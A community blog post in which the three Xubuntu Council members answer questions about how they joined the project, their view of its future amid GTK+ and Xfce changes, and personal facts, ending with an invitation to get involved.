As the titles alone can tell you, the three council members all have a strong history with Xubuntu project. Today we want to go a bit deeper than just these titles, which is why we asked the council members a few quick questions so you can start to get to know them.

Interviewing the Council What inspired you to get involved with the Xubuntu project?

Sean: I started using Xubuntu in 2006 (when it was first released) and used it all throughout college and into my career. I started reporting bugs to the project in 2012 and contributing to the Ubuntu community later that year. My (selfish) inspiration was that I wanted to make my preferred operating system even better!

Simon: When Dapper Drake saw the light of day 10 years ago (I know, it’s incredible – it’s been a decade!) and I started using LInux my first choice was – and this has never changed – Xfce and Ubuntu. At first I never thought I would be fit to contribute, but the warm welcome from the amazing community around these projects pulled me in.

Pasi: When I converted to Linux from Windows for good in 2006, I started contributing to the Amarok project, my media player of choice back then. A few years later my contributions there slowed down at it felt like a natural step to start working with the operating system I was using.

Can you share some thoughts about the future of Xubuntu?

Sean: Xubuntu has always taken a conversative approach to the desktop. It includes simple, effective applications on top of a traditional desktop. That said, the technologies that Xubuntu is built on (GTK+, GStreamer, Xfce, and many many others) are undergoing significant changes and we’re always looking to improve. I think we’ll continue to see improvements that will welcome new users and please our longtime fans.

Simon: Change is hard for many people, however based on a recent psych test I am “surprisingly optimistic” :) While Xubuntu – and this is heritage from Xfce – has a what many would call “conservative” approach I believe we can still improve the current experience by quite a bit. I don’t mean this change has to be radical, but it should be more than just “repainting the walls”. This is why I personally welcome the changes in GTK+ and why I believe our future is bright.

Pasi: As Sean mentioned, we will be seeing changes in Xubuntu in consequence of the underlying technologies and components – whether we like them or not. To be able to be part of the decision making and that Xubuntu can and will feel as integrated and polished as it does now, it’s important to keep involved with the migration work. While this will mean less resources to put into Xubuntu-specific work in the near future, I believe it leads us into a better place later.

So that people can get to know you a bit better, is there an interesting fact about yourself that you wish to share?

Sean: Two unrelated things: I’m also an Xfce developer and one of my current life goals is to visit Japan (and maybe one day live there).

Simon: My background is a bit atypical: my two majors at University were Philosophy and Comparitive Religious Studies.

Pasi: In addition to contributing to open source, I use my free time to play modern board games. I have about 75 of them in my office closet.

Further questions?

If you have any questions about the council, please don’t hesitate to ask! You can contact us by joining the IRC channel #xubuntu-devel on freenode or by joining the Xubuntu-devel mailing list.

Additionally, if this sparked your interest to get involved, be in touch with anybody from the Xubuntu team. There are a lot of things to do and all kinds of skills are useful. Maybe someday you might even become a Xubuntu Council member!

Pages

Subscribe to Ubuntu Arizona LoCo Team aggregator